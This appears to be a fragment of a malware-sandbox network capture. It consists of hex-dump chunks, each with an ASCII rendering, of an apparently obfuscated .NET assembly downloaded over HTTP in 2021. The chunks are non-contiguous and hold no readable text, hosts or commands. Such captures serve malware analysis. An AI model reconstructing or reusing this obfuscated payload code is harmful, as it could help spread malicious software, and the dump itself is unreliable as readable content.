                                        2021-09-27 18:36:18 UTC45INData Raw: ff ff 11 4b 16 11 4b 8e 69 28 a1 05 00 06 20 10 00 00 00 28 d1 05 00 06 39 58 f4 ff ff 26 20 ad 00 00 00 38 4d f4 ff ff 11 47 17 28 81 05 00 06 28 af 05 00 06 28 b0 05 00 06 13 3a 20 27 00 00 00 28 d1 05 00 06 3a 2a f4 ff ff 26 38 20 f4 ff ff fe 0c 04 00 20 06 00 00 00 fe 0c 79 00 9c 20 85 02 00 00 fe 0e 21 00 38 04 f4 ff ff 20 69 00 00 00 20 25 00 00 00 58 fe 0e 00 00 20 c9 01 00 00 28 d1 05 00 06 3a ea f3 ff ff 26 38 e0 f3 ff ff fe 0c 0a 00 20 1e 00 00 00 20 8f 00 00 00 20 2f 00 00 00 59 9c 20 31 00 00 00 28 d1 05 00 06 3a c0 f3 ff ff 26 38 b6 f3 ff ff fe 0c 04 00 20 06 00 00 00 fe 0c 79 00 9c 20 f2 00 00 00 38 a2 f3 ff ff 11 4e 13 62 20 1e 02 00 00 28 d2 05 00 06 39 8f f3 ff ff 26 38 85 f3 ff ff 20 e8 00 00 00 20 4d 00 00 00 59 fe 0e 00 00 20 60 00 00
                                        Data Ascii: KKi( (9X& 8MG(((: '(:*&8 y !8 i %X (:&8 /Y 1(:&8 y 8Nb (9&8 MY `
                                        2021-09-27 18:36:18 UTC46INData Raw: 5f 00 00 00 28 d2 05 00 06 39 0e ef ff ff 26 38 04 ef ff ff 11 71 11 20 18 58 11 5c 18 91 9c 20 68 02 00 00 38 f3 ee ff ff fe 0c 0a 00 20 0b 00 00 00 fe 0c 00 00 9c 20 31 01 00 00 38 db ee ff ff 38 9f 09 00 00 20 de 00 00 00 28 d2 05 00 06 39 c7 ee ff ff 26 38 bd ee ff ff fe 0c 04 00 20 00 00 00 00 fe 0c 79 00 9c 20 24 02 00 00 38 a9 ee ff ff 7e 2d 00 00 0a 13 3a 20 9a 02 00 00 38 98 ee ff ff 11 33 19 1f 6a 9c 20 4c 01 00 00 38 88 ee ff ff 11 71 11 20 1c 58 11 0e 1c 91 9c 20 1c 01 00 00 28 d1 05 00 06 3a 6e ee ff ff 26 38 64 ee ff ff 38 ee 32 00 00 20 b8 00 00 00 38 59 ee ff ff fe 0c 0a 00 20 10 00 00 00 20 a5 00 00 00 20 34 00 00 00 58 9c 20 79 02 00 00 28 d2 05 00 06 39 35 ee ff ff 26 20 08 01 00 00 38 2a ee ff ff 11 2c 73 43 00 00 0a 28 be 05 00 06 13
                                        Data Ascii: _(9&8q X\ h8 188 (9&8 y $8~-: 83j L8q X (:n&8d82 8Y 4X y(95& 8*,sC(
                                        2021-09-27 18:36:18 UTC48INData Raw: 01 fe 0e 04 00 20 09 02 00 00 38 b4 e9 ff ff 20 5b 00 00 00 20 0f 00 00 00 58 fe 0e 00 00 20 82 00 00 00 28 d1 05 00 06 3a 96 e9 ff ff 26 38 8c e9 ff ff fe 0c 04 00 20 01 00 00 00 20 a5 00 00 00 20 37 00 00 00 59 9c 20 22 00 00 00 38 71 e9 ff ff 11 1d 17 40 49 23 00 00 20 4f 01 00 00 38 5f e9 ff ff fe 0c 0a 00 20 03 00 00 00 20 32 00 00 00 20 04 00 00 00 58 9c 20 bf 01 00 00 28 d1 05 00 06 39 3b e9 ff ff 26 20 d0 01 00 00 38 30 e9 ff ff 11 83 1a 1f 69 9c 20 9c 00 00 00 38 20 e9 ff ff fe 0c 0a 00 20 1d 00 00 00 20 2c 00 00 00 20 66 00 00 00 58 9c 20 58 01 00 00 38 01 e9 ff ff 11 77 17 58 13 77 20 38 01 00 00 38 f1 e8 ff ff 11 71 11 20 1d 58 11 5c 1d 91 9c 20 77 02 00 00 28 d2 05 00 06 39 d7 e8 ff ff 26 38 cd e8 ff ff 28 81 05 00 06 28 82 05 00 06 28 83 05
                                        Data Ascii: 8 [ X (:&8 7Y "8q@I# O8_ 2 X (9;& 80i 8 , fX X8wXw 88q X\ w(9&8(((
                                        2021-09-27 18:36:18 UTC49INData Raw: 00 58 9c 20 b7 01 00 00 38 5d e4 ff ff 38 92 18 00 00 20 81 00 00 00 fe 0e 21 00 38 46 e4 ff ff fe 0c 0a 00 20 1b 00 00 00 fe 0c 00 00 9c 20 d0 00 00 00 28 d1 05 00 06 3a 2d e4 ff ff 26 38 23 e4 ff ff fe 0c 04 00 20 05 00 00 00 fe 0c 79 00 9c 20 ce 01 00 00 28 d2 05 00 06 39 0a e4 ff ff 26 38 00 e4 ff ff 20 20 00 00 00 20 03 00 00 00 58 fe 0e 00 00 20 8e 00 00 00 fe 0e 21 00 38 e3 e3 ff ff 38 99 06 00 00 20 df 01 00 00 38 d8 e3 ff ff 7e db 00 00 04 28 c3 05 00 06 28 cc 05 00 06 28 cd 05 00 06 20 81 00 00 00 28 d2 05 00 06 3a b5 e3 ff ff 26 20 a5 01 00 00 38 aa e3 ff ff 20 05 00 00 00 20 3b 00 00 00 58 fe 0e 79 00 20 7f 01 00 00 38 91 e3 ff ff fe 0c 0a 00 20 1e 00 00 00 20 5e 00 00 00 20 72 00 00 00 58 9c 20 48 02 00 00 28 d2 05 00 06 39 6d e3 ff ff 26 20
                                        Data Ascii: X 8]8 !8F (:-&8# y (9&8 X !88 8~((( (:& 8 ;Xy 8 ^ rX H(9m&
                                        2021-09-27 18:36:18 UTC50INData Raw: 0d df ff ff fe 0c 0a 00 20 14 00 00 00 fe 0c 00 00 9c 20 43 00 00 00 38 f5 de ff ff 20 5b 00 00 00 20 59 00 00 00 58 fe 0e 00 00 20 30 00 00 00 38 dc de ff ff fe 0c 04 00 20 0d 00 00 00 20 48 00 00 00 20 75 00 00 00 58 9c 20 1a 01 00 00 38 bd de ff ff 20 fd 00 00 00 20 54 00 00 00 59 fe 0e 79 00 20 a2 00 00 00 38 a4 de ff ff 11 77 11 64 3f 8d 0d 00 00 20 13 00 00 00 28 d2 05 00 06 3a 8c de ff ff 26 20 17 00 00 00 38 81 de ff ff fe 0c 0a 00 20 01 00 00 00 20 f7 00 00 00 20 52 00 00 00 59 9c 20 b9 01 00 00 28 d1 05 00 06 3a 5d de ff ff 26 38 53 de ff ff 11 2c 73 43 00 00 0a 28 bd 05 00 06 6a 13 5a 20 fc 00 00 00 38 3e de ff ff 11 76 28 a6 05 00 06 13 61 20 36 00 00 00 28 d1 05 00 06 3a 26 de ff ff 26 38 1c de ff ff 16 13 68 20 0f 02 00 00 28 d1 05 00 06 3a
                                        Data Ascii: C8 [ YX 08 H uX 8 TYy 8wd? (:& 8 RY (:]&8S,sC(jZ 8>v(a 6(:&&8h (:
                                        2021-09-27 18:36:18 UTC52INData Raw: 00 00 38 b1 d9 ff ff fe 0c 04 00 20 06 00 00 00 20 31 00 00 00 20 5e 00 00 00 58 9c 20 c7 00 00 00 38 92 d9 ff ff 20 9e 00 00 00 20 34 00 00 00 59 fe 0e 79 00 20 3f 02 00 00 28 d2 05 00 06 39 74 d9 ff ff 26 20 b6 00 00 00 38 69 d9 ff ff 11 33 1f 0a 1f 6c 9c 20 82 02 00 00 38 58 d9 ff ff 12 3e 28 f4 00 00 0a 11 18 1a 5a 6a 58 73 43 00 00 0a 11 76 28 a6 05 00 06 28 b3 05 00 06 20 2a 02 00 00 38 30 d9 ff ff 7e da 00 00 04 28 9f 05 00 06 28 a0 05 00 06 13 1f 20 3b 00 00 00 28 d1 05 00 06 3a 10 d9 ff ff 26 38 06 d9 ff ff 20 bd 00 00 00 20 1b 00 00 00 58 fe 0e 00 00 20 2f 02 00 00 28 d2 05 00 06 39 ec d8 ff ff 26 38 e2 d8 ff ff fe 0c 04 00 20 00 00 00 00 20 07 00 00 00 20 7c 00 00 00 58 9c 20 59 01 00 00 38 c7 d8 ff ff 11 4e 11 0d 19 58 11 36 20 00 00 00 ff 5f
                                        Data Ascii: 8 1 ^X 8 4Yy ?(9t& 8i3l 8X>(ZjXsCv(( *80~(( ;(:&8 X /(9&8 |X Y8NX6 _
                                        2021-09-27 18:36:18 UTC53INData Raw: 00 45 02 00 00 00 cf 00 00 00 05 00 00 00 38 ca 00 00 00 00 11 5a 73 43 00 00 0a d0 48 00 00 02 28 b6 05 00 06 28 bb 05 00 06 13 6d 20 00 00 00 00 28 d1 05 00 06 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 57 00 45 02 00 00 00 3a 00 00 00 05 00 00 00 38 35 00 00 00 d0 48 00 00 02 28 b6 05 00 06 11 6d 28 c3 05 00 06 28 c4 05 00 06 74 48 00 00 02 80 db 00 00 04 20 00 00 00 00 28 d2 05 00 06 39 bf ff ff ff 26 38 b5 ff ff ff dd 47 00 00 00 26 20 00 00 00 00 28 d2 05 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 50 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 15 00 00 00 20 00 00 00 00 28 d2 05 00 06 39 2a ff ff ff 26 38 20 ff ff ff dd 73 24 00 00 20 a7 02 00 00 38 73 d3 ff ff 16 13 3c 20 d2 01 00 00 38 66 d3 ff ff fe 0c 0a 00 20 13
                                        Data Ascii: E8ZsCH((m (9& 8WE:85H(m((tH (9&8G& (9& 8PE8 (9*&8 s$ 8s< 8f
                                        2021-09-27 18:36:18 UTC57INData Raw: ff ff fe 0c 04 00 20 0c 00 00 00 fe 0c 79 00 9c 20 7c 02 00 00 28 d1 05 00 06 3a bb c3 ff ff 26 38 b1 c3 ff ff fe 0c 04 00 13 4b 20 31 02 00 00 38 a5 c3 ff ff 11 1d 1a 40 2c da ff ff 20 80 01 00 00 38 93 c3 ff ff fe 0c 04 00 20 03 00 00 00 fe 0c 79 00 9c 20 9f 02 00 00 38 7b c3 ff ff fe 0c 0a 00 20 15 00 00 00 fe 0c 00 00 9c 20 e1 01 00 00 38 63 c3 ff ff fe 0c 0a 00 20 18 00 00 00 20 7d 00 00 00 20 1a 00 00 00 59 9c 20 f1 00 00 00 28 d1 05 00 06 3a 3f c3 ff ff 26 38 35 c3 ff ff 20 3b 00 00 00 20 46 00 00 00 58 fe 0e 79 00 20 3e 00 00 00 38 20 c3 ff ff fe 0c 0a 00 20 03 00 00 00 20 ba 00 00 00 20 4c 00 00 00 59 9c 20 5f 02 00 00 28 d1 05 00 06 39 fc c2 ff ff 26 20 66 02 00 00 38 f1 c2 ff ff 7e db 00 00 04 28 cb 05 00 06 20 06 01 00 00 28 d1 05 00 06 3a d8
                                        Data Ascii: y |(:&8K 18@, 8 y 8{ 8c } Y (:?&85 ; FXy >8 LY _(9& f8~( (:
                                        2021-09-27 18:36:18 UTC61INData Raw: 00 00 9c 20 0e 00 00 00 fe 0e 21 00 38 40 b3 ff ff 20 76 00 00 00 20 5f 00 00 00 58 fe 0e 00 00 20 25 00 00 00 38 2b b3 ff ff fe 0c 0a 00 20 19 00 00 00 20 c7 00 00 00 20 42 00 00 00 59 9c 20 d5 01 00 00 fe 0e 21 00 38 04 b3 ff ff 11 43 16 28 78 05 00 06 26 20 63 00 00 00 28 d2 05 00 06 39 f0 b2 ff ff 26 20 16 00 00 00 38 e5 b2 ff ff 1f 17 13 7b 20 cc 01 00 00 38 d7 b2 ff ff 11 71 11 20 1c 58 11 1b 1c 91 9c 20 06 00 00 00 28 d2 05 00 06 3a bd b2 ff ff 26 20 53 01 00 00 38 b2 b2 ff ff fe 0c 0a 00 20 07 00 00 00 20 24 00 00 00 20 04 00 00 00 58 9c 20 45 01 00 00 28 d1 05 00 06 3a 8e b2 ff ff 26 38 84 b2 ff ff 11 62 25 13 8b 3a 67 d5 ff ff 20 f1 01 00 00 38 74 b2 ff ff 16 80 c4 00 00 04 20 78 02 00 00 38 64 b2 ff ff fe 0c 04 00 20 0b 00 00 00 20 b6 00 00 00
                                        Data Ascii: !8@ v _X %8+ BY !8C(x& c(9& 8{ 8q X (:& S8 $ X E(:&8b%:g 8t x8d
                                        2021-09-27 18:36:18 UTC65INData Raw: 11 17 11 06 19 58 e0 91 1f 18 62 11 17 11 06 18 58 e0 91 1f 10 62 60 11 17 11 06 17 58 e0 91 1e 62 60 11 17 11 06 e0 91 60 13 58 20 44 00 00 00 38 61 a4 ff ff 11 71 11 20 18 58 11 0e 18 91 9c 20 4b 02 00 00 38 4c a4 ff ff 20 7a 00 00 00 20 29 00 00 00 59 fe 0e 79 00 20 76 02 00 00 28 d1 05 00 06 3a 2e a4 ff ff 26 20 8f 00 00 00 38 23 a4 ff ff fe 0c 0a 00 20 07 00 00 00 20 77 00 00 00 20 57 00 00 00 58 9c 20 32 00 00 00 28 d1 05 00 06 39 ff a3 ff ff 26 20 e1 00 00 00 38 f4 a3 ff ff 11 68 11 03 11 03 8e 69 17 11 77 58 59 91 60 13 68 20 42 00 00 00 28 d2 05 00 06 3a d4 a3 ff ff 26 20 ea 00 00 00 38 c9 a3 ff ff 11 17 8e 69 1a 5b 13 7f 20 33 02 00 00 38 b7 a3 ff ff 11 76 28 a6 05 00 06 13 8a 20 30 02 00 00 38 a4 a3 ff ff 20 56 00 00 00 20 0f 00 00 00 59 fe 0e
                                        Data Ascii: XbXb`Xb``X D8aq X K8L z )Yy v(:.& 8# w WX 2(9& 8hiwXY`h B(:& 8i[ 38v( 08 V Y
                                        2021-09-27 18:36:18 UTC69INData Raw: 06 2a 00 3a fe 09 00 00 fe 09 01 00 6f b6 00 00 0a 2a 00 2a fe 09 00 00 6f be 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f f6 05 00 06 2a 00 2a fe 09 00 00 6f f9 05 00 06 2a 00 2e 00 fe 09 00 00 28 11 01 00 0a 2a 2a fe 09 00 00 6f fd 00 00 0a 2a 00 2a fe 09 00 00 6f 12 01 00 0a 2a 00 1e 00 28 0e 05 00 06 2a 3a fe 09 00 00 fe 09 01 00 6f 13 01 00 0a 2a 00 4a fe 09 00 00 fe 09 01 00 fe 09 02 00 6f 14 01 00 0a 2a 00 1e 00 28 2a 05 00 06 2a 5a fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 6f 0a 01 00 0a 2a 00 2a fe 09 00 00 6f 15 01 00 0a 2a 00 2e 00 fe 09 00 00 28 2b 05 00 06 2a 2a fe 09 00 00 6f 0b 01 00 0a 2a 00 16 14 14 fe 01 2a 00 00 0a 14 2a 00 1e 00 28 1d 06 00 06 2a 2e 00 fe 09 00 00 28 a9 00 00 0a 2a 2e 00 fe 09 00 00 28 a2 00 00 0a 2a 2a fe 09 00
                                        Data Ascii: *:o**o*:o**o*.(**o**o*(*:o*Jo*(**Zo**o*.(+**o***(*.(*.(**
                                        2021-09-27 18:36:18 UTC73INData Raw: bb 31 00 00 3c 32 00 00 8f 1d 00 00 12 04 00 00 88 0c 00 00 4f 28 00 00 d9 12 00 00 bf 30 00 00 c9 0e 00 00 b4 2e 00 00 8b 27 00 00 f4 17 00 00 8d 09 00 00 e8 06 00 00 0b 0d 00 00 ae 0b 00 00 24 18 00 00 5e 24 00 00 2d 2a 00 00 dd 01 00 00 be 23 00 00 74 12 00 00 2d 05 00 00 1b 10 00 00 64 20 00 00 32 23 00 00 2d 2c 00 00 be 11 00 00 24 32 00 00 4f 13 00 00 26 0c 00 00 c1 01 00 00 39 00 00 00 a3 1c 00 00 77 1f 00 00 c4 2a 00 00 a3 03 00 00 85 0a 00 00 c0 14 00 00 02 09 00 00 69 05 00 00 64 1e 00 00 f0 1a 00 00 05 2b 00 00 c0 21 00 00 ae 00 00 00 12 0f 00 00 de 33 00 00 79 08 00 00 bb 08 00 00 dd 0c 00 00 19 08 00 00 b4 07 00 00 6c 03 00 00 02 13 00 00 ef 22 00 00 a7 20 00 00 bb 18 00 00 ec 2a 00 00 3c 0e 00 00 ac 16 00 00 37 15 00 00 02 16 00 00 dd 2a 00
                                        Data Ascii: 1<2O(0.'$^$-*#t-d 2#-,$2O&9w*id+!3yl" *<7*
                                        2021-09-27 18:36:18 UTC77INData Raw: 3a ec ff ff 38 57 1c 00 00 20 48 01 00 00 38 2b ec ff ff fe 0c 13 00 20 00 00 00 00 20 5f 00 00 00 20 24 00 00 00 58 9c 20 60 00 00 00 38 0c ec ff ff 20 ab 00 00 00 20 1d 00 00 00 58 fe 0e 18 00 20 30 00 00 00 28 41 06 00 06 39 ee eb ff ff 26 38 e4 eb ff ff fe 0c 13 00 20 04 00 00 00 fe 0c 2a 00 9c 20 02 01 00 00 38 d0 eb ff ff fe 0c 13 00 20 01 00 00 00 20 05 00 00 00 20 3f 00 00 00 58 9c 20 74 01 00 00 38 b1 eb ff ff fe 0c 13 00 20 13 00 00 00 fe 0c 2a 00 9c 20 b4 00 00 00 38 99 eb ff ff 20 41 00 00 00 20 3d 00 00 00 58 fe 0e 2a 00 20 42 01 00 00 38 80 eb ff ff fe 0c 13 00 20 08 00 00 00 fe 0c 2a 00 9c 20 40 00 00 00 28 40 06 00 06 39 63 eb ff ff 26 20 0c 01 00 00 38 58 eb ff ff 20 f5 00 00 00 20 51 00 00 00 59 fe 0e 2a 00 20 9d 01 00 00 38 3f eb ff ff
                                        Data Ascii: :8W H8+ _ $X `8 X 0(A9&8 * 8 ?X t8 * 8 A =X* B8 * @(@9c& 8X QY* 8?
                                        2021-09-27 18:36:18 UTC82INData Raw: fe 0e 2a 00 20 ac 01 00 00 38 ab db ff ff fe 0c 13 00 20 1d 00 00 00 fe 0c 2a 00 9c 20 17 00 00 00 28 41 06 00 06 39 8e db ff ff 26 38 84 db ff ff 7e e7 00 00 04 39 f2 f7 ff ff 20 cf 00 00 00 28 40 06 00 06 3a 6f db ff ff 26 38 65 db ff ff 20 bc 00 00 00 20 3e 00 00 00 59 fe 0e 2a 00 20 75 01 00 00 38 50 db ff ff 20 2a 00 00 00 20 3a 00 00 00 58 fe 0e 2e 00 20 4f 01 00 00 38 37 db ff ff 20 30 00 00 00 20 29 00 00 00 58 fe 0e 2e 00 20 fe 00 00 00 28 41 06 00 06 39 19 db ff ff 26 20 db 00 00 00 38 0e db ff ff 20 8f 00 00 00 20 2f 00 00 00 59 fe 0e 2a 00 20 68 00 00 00 38 f5 da ff ff 20 a7 00 00 00 20 3c 00 00 00 58 fe 0e 2c 00 20 36 00 00 00 38 dc da ff ff 20 c7 00 00 00 20 42 00 00 00 59 fe 0e 2e 00 20 9a 00 00 00 28 41 06 00 06 3a be da ff ff 26 20 cd 00
                                        Data Ascii: * 8 * (A9&8~9 (@:o&8e >Y* u8P * :X. O87 0 )X. (A9& 8 /Y* h8 <X, 68 BY. (A:&
                                        2021-09-27 18:36:18 UTC86INData Raw: 00 00 00 fe 0c 2e 00 9c 20 a6 00 00 00 28 41 06 00 06 39 1d cb ff ff 26 38 13 cb ff ff 20 ba 00 00 00 20 35 00 00 00 58 fe 0e 2c 00 20 bc 00 00 00 28 41 06 00 06 39 f9 ca ff ff 26 38 ef ca ff ff fe 0c 13 00 20 14 00 00 00 20 fa 00 00 00 20 53 00 00 00 59 9c 20 7c 00 00 00 38 d4 ca ff ff fe 0c 10 00 20 0a 00 00 00 20 bb 00 00 00 20 3e 00 00 00 59 9c 20 25 00 00 00 28 40 06 00 06 3a b0 ca ff ff 26 38 a6 ca ff ff fe 0c 10 00 20 00 00 00 00 fe 0c 2c 00 9c 20 ae 00 00 00 28 40 06 00 06 3a 8d ca ff ff 26 20 88 00 00 00 38 82 ca ff ff fe 0c 10 00 20 0d 00 00 00 20 9e 00 00 00 20 6d 00 00 00 59 9c 20 c7 00 00 00 38 63 ca ff ff fe 0c 10 00 20 07 00 00 00 fe 0c 2c 00 9c 20 74 00 00 00 38 4b ca ff ff 20 bf 00 00 00 20 3f 00 00 00 59 fe 0e 2c 00 20 97 00 00 00 38 32
                                        Data Ascii: . (A9&8 5X, (A9&8 SY |8 >Y %(@:&8 , (@:& 8 mY 8c , t8K ?Y, 82
                                        2021-09-27 18:36:18 UTC90INData Raw: 05 28 79 e5 4e 4b 0e 02 0e 00 0e 01 6f ac 06 00 06 2a 42 28 1e 05 00 06 d0 74 00 00 02 28 15 05 00 06 2a 00 00 00 3e 2b 05 28 81 be 47 32 0e 00 6f b0 06 00 06 2a 42 28 1e 05 00 06 d0 75 00 00 02 28 15 05 00 06 2a 00 00 00 46 2b 05 28 3d 09 5f 45 0e 01 0e 00 6f b4 06 00 06 2a 00 00 42 28 1e 05 00 06 d0 76 00 00 02 28 15 05 00 06 2a 00 00 00 46 2b 05 28 73 5c 4d 4d 0e 01 0e 00 6f b8 06 00 06 2a 00 00 42 28 1e 05 00 06 d0 77 00 00 02 28 15 05 00 06 2a 00 00 00 46 2b 05 28 75 74 71 3a 0e 01 0e 00 6f bc 06 00 06 2a 00 00 42 28 1e 05 00 06 d0 78 00 00 02 28 15 05 00 06 2a 00 00 00 56 2b 05 28 05 ba 3d 3f 0e 03 0e 00 0e 01 0e 02 6f c0 06 00 06 2a 00 00 42 28 1e 05 00 06 d0 79 00 00 02 28 15 05 00 06 2a 00 00 00 46 2b 05 28 8e 80 09 5f 0e 01 0e 00 6f c4 06 00 06
                                        Data Ascii: (yNKo*B(t(*>+(G2o*B(u(*F+(=_Eo*B(v(*F+(s\MMo*B(w(*F+(utq:o*B(x(*V+(=?o*B(y(*F+(_o
                                        2021-09-27 18:36:18 UTC94INData Raw: 00 71 03 00 00 cf 01 00 00 0a 00 00 00 65 00 00 00 04 00 00 00 09 00 00 00 0e 00 00 00 74 00 00 00 05 00 00 00 0b 00 00 00 0f 00 00 00 01 00 00 00 23 00 00 00 02 00 00 00 09 00 00 00 02 00 00 00 07 00 00 00 06 00 00 00 4e 00 00 00 08 00 00 00 15 00 00 00 00 00 49 02 01 00 00 00 ff ff 00 00 00 00 02 00 00 00 ff ff 06 00 09 00 24 00 06 00 45 00 4a 00 06 00 51 00 4a 00 06 00 58 00 24 00 06 00 71 00 24 00 06 00 8e 00 a2 00 06 00 c1 00 4a 00 06 00 c9 00 dd 00 23 00 f0 00 00 00 06 00 ff 00 a2 00 06 00 0d 01 24 00 06 00 26 01 24 00 06 00 41 01 24 00 06 00 58 01 78 01 06 00 98 01 4a 00 06 00 9e 01 78 01 06 00 bc 01 d5 01 06 00 ef 01 24 00 06 00 0c 02 78 01 0a 00 84 02 94 02 0a 00 fa 02 03 03 06 00 47 03 4a 00 06 00 d2 03 4a 00 06 00 b8 04 4a 00 0e 00 00 05 18 05
                                        Data Ascii: qet#NI$EJQJX$q$J#$&$A$XxJx$xGJJJ
                                        2021-09-27 18:36:18 UTC97INData Raw: 00 01 00 00 3e 10 00 00 5d 00 c1 01 38 07 00 01 00 00 52 10 00 00 5d 00 c3 01 3c 07 00 01 00 00 66 10 00 00 5d 00 c4 01 40 07 00 01 00 00 7a 10 00 00 5d 00 c5 01 44 07 00 01 00 00 8e 10 00 00 5d 00 c8 01 48 07 00 01 00 00 a2 10 00 00 5d 00 c9 01 4c 07 00 01 00 00 b6 10 00 00 5d 00 ca 01 50 07 00 01 00 00 ca 10 00 00 5d 00 cb 01 54 07 00 01 00 00 de 10 00 00 5d 00 cc 01 58 07 00 01 00 00 f2 10 00 00 5d 00 cd 01 5c 07 00 01 00 00 06 11 00 00 5d 00 ce 01 60 07 00 01 00 00 1a 11 00 00 5d 00 cf 01 64 07 00 01 00 00 2e 11 00 00 5d 00 d0 01 68 07 00 01 00 00 42 11 00 00 5d 00 d1 01 6c 07 00 01 00 00 56 11 00 00 5d 00 d2 01 70 07 00 01 00 00 6a 11 00 00 5d 00 d3 01 74 07 00 01 00 00 7e 11 00 00 5d 00 d4 01 78 07 00 01 00 00 92 11 00 00 5d 00 d5 01 7c 07 00 01 00
                                        Data Ascii: >]8R]<f]@z]D]H]L]P]T]X]\]`]d.]hB]lV]pj]t~]x]|
                                        2021-09-27 18:36:18 UTC101INData Raw: 16 22 01 01 00 ec 21 00 00 08 00 93 00 49 16 0e 01 01 00 f4 21 00 00 08 00 11 18 66 15 0e 01 01 00 04 23 00 00 08 00 13 08 9e 16 22 01 01 00 14 23 00 00 08 00 13 08 b2 16 1d 01 01 00 24 23 00 00 08 00 13 08 bc 16 74 01 01 00 34 23 00 00 08 00 13 08 c6 16 7f 01 01 00 44 23 00 00 08 00 93 00 d0 16 0e 01 01 00 4c 23 00 00 08 00 93 00 e4 16 0e 01 01 00 54 23 00 00 08 00 93 00 f8 16 0e 01 01 00 5c 23 00 00 08 00 93 00 0c 17 0e 01 01 00 64 23 00 00 08 00 93 00 20 17 19 01 01 00 6c 23 00 00 08 00 93 00 34 17 8a 01 01 00 74 23 00 00 08 00 46 02 84 17 a3 01 01 00 84 23 00 00 08 00 46 02 8d 17 ad 01 02 00 94 23 00 00 08 00 83 00 99 17 b6 01 02 00 a4 23 00 00 08 00 46 02 a8 17 c1 01 02 00 b4 23 00 00 08 00 11 00 b1 17 ca 01 02 00 c4 23 00 00 08 00 01 00 fa 17 e6 01
                                        Data Ascii: "!I!f#"#$#t4#D#L#T#\#d# l#4t#F#F##F##
                                        2021-09-27 18:36:18 UTC105INData Raw: 81 00 08 01 70 34 00 00 08 00 86 18 3f 00 e1 08 09 01 80 34 00 00 08 00 86 18 3f 00 e6 08 0a 01 90 34 00 00 08 00 86 18 3f 00 ee 08 0c 01 a0 34 00 00 08 00 c6 00 1e 27 08 08 0e 01 b0 34 00 00 08 00 c6 00 29 27 08 08 0e 01 b8 34 00 00 08 00 c6 00 34 27 a2 08 0e 01 c8 34 00 00 08 00 c3 02 a0 25 19 08 0f 01 d8 34 00 00 08 00 83 00 f9 2a 19 08 10 01 e8 34 00 00 08 00 c6 00 3f 27 aa 08 11 01 f8 34 00 00 08 00 c3 02 c1 25 08 08 11 01 00 35 00 00 08 00 c6 00 4a 27 aa 08 11 01 08 35 00 00 08 00 86 00 04 2b aa 08 11 01 10 35 00 00 08 00 c6 00 55 27 aa 08 11 01 18 35 00 00 08 00 c6 00 60 27 aa 08 11 01 20 35 00 00 08 00 c6 00 6b 27 aa 08 11 01 28 35 00 00 08 00 c6 00 76 27 aa 08 11 01 30 35 00 00 08 00 c6 00 81 27 aa 08 11 01 38 35 00 00 08 00 c6 00 8c 27 af 08 11
                                        Data Ascii: p4?4?4?4'4)'44'4%4*4?'4%5J'5+5U'5`' 5k'(5v'05'85'
                                        2021-09-27 18:36:18 UTC109INData Raw: 08 66 01 44 42 00 00 08 00 c6 00 e4 27 aa 08 66 01 4c 42 00 00 08 00 c6 00 ef 27 af 08 66 01 54 42 00 00 08 00 c6 00 fa 27 aa 08 66 01 5c 42 00 00 08 00 c6 00 05 28 aa 08 66 01 64 42 00 00 08 00 c6 00 10 28 aa 08 66 01 6c 42 00 00 08 00 c6 00 1b 28 aa 08 66 01 74 42 00 00 08 00 c6 00 26 28 aa 08 66 01 7c 42 00 00 08 00 c6 00 31 28 aa 08 66 01 84 42 00 00 08 00 c6 00 3c 28 af 08 66 01 8c 42 00 00 08 00 c6 00 47 28 af 08 66 01 94 42 00 00 08 00 c6 00 52 28 aa 08 66 01 9c 42 00 00 08 00 c6 00 5d 28 aa 08 66 01 a4 42 00 00 08 00 c6 00 68 28 aa 08 66 01 ac 42 00 00 08 00 c6 00 73 28 aa 08 66 01 b4 42 00 00 08 00 c6 00 7e 28 aa 08 66 01 bc 42 00 00 08 00 c6 00 89 28 aa 08 66 01 c4 42 00 00 08 00 c6 00 94 28 af 08 66 01 cc 42 00 00 08 00 c6 00 9f 28 af 08 66 01
                                        Data Ascii: fDB'fLB'fTB'f\B(fdB(flB(ftB&(f|B1(fB<(fBG(fBR(fB](fBh(fBs(fB~(fB(fB(fB(f
                                        2021-09-27 18:36:18 UTC114INData Raw: c4 01 40 52 00 00 08 00 c3 02 5a 3b 0c 08 c5 01 50 52 00 00 08 00 c3 02 a0 25 19 08 c6 01 58 52 00 00 08 00 c3 02 cc 25 25 08 c7 01 68 52 00 00 08 00 c3 02 d7 25 08 08 c7 01 70 52 00 00 08 00 c3 02 ab 25 1f 08 c7 01 80 52 00 00 08 00 c3 02 b6 25 1f 08 c8 01 90 52 00 00 08 00 c3 02 c1 25 08 08 c9 01 98 52 00 00 08 00 91 18 66 15 0e 01 c9 01 20 53 00 00 08 00 93 00 17 3d 0e 01 c9 01 28 53 00 00 08 00 93 00 2b 3d 0e 01 c9 01 30 53 00 00 08 00 93 00 3f 3d 19 01 c9 01 38 53 00 00 08 00 93 00 53 3d 1e 0a c9 01 40 53 00 00 08 00 93 00 67 3d 21 09 c9 01 48 53 00 00 08 00 93 00 7b 3d 08 0a c9 01 50 53 00 00 08 00 93 00 8f 3d 46 05 ca 01 58 53 00 00 08 00 93 00 a3 3d 9d 08 ca 01 60 53 00 00 08 00 93 00 b7 3d 9d 08 ca 01 68 53 00 00 08 00 93 00 cb 3d 0e 01 ca 01 70
                                        Data Ascii: @RZ;PR%XR%%hR%pR%R%R%Rf S=(S+=0S?=8SS=@Sg=!HS{=PS=FXS=`S=hS=p
                                        2021-09-27 18:36:18 UTC118INData Raw: 02 cc 65 00 00 08 00 c3 02 c1 25 08 08 5c 02 dc 65 00 00 08 00 91 18 66 15 0e 01 5c 02 60 66 00 00 08 00 93 00 8f 52 0e 01 5c 02 68 66 00 00 08 00 93 00 a3 52 0e 01 5c 02 70 66 00 00 08 00 93 00 b7 52 19 01 5c 02 78 66 00 00 08 00 93 00 cb 52 50 0f 5c 02 80 66 00 00 08 00 93 00 df 52 46 05 5c 02 88 66 00 00 08 00 93 00 f3 52 21 09 5c 02 90 66 00 00 08 00 93 00 07 53 08 0a 5c 02 98 66 00 00 08 00 93 00 1b 53 9d 08 5d 02 a0 66 00 00 08 00 93 00 2f 53 2d 09 5d 02 a8 66 00 00 08 00 93 00 43 53 2d 09 5d 02 b0 66 00 00 08 00 93 00 57 53 0e 01 5d 02 b8 66 00 00 08 00 86 18 3f 00 22 00 5d 02 c8 66 00 00 08 00 c3 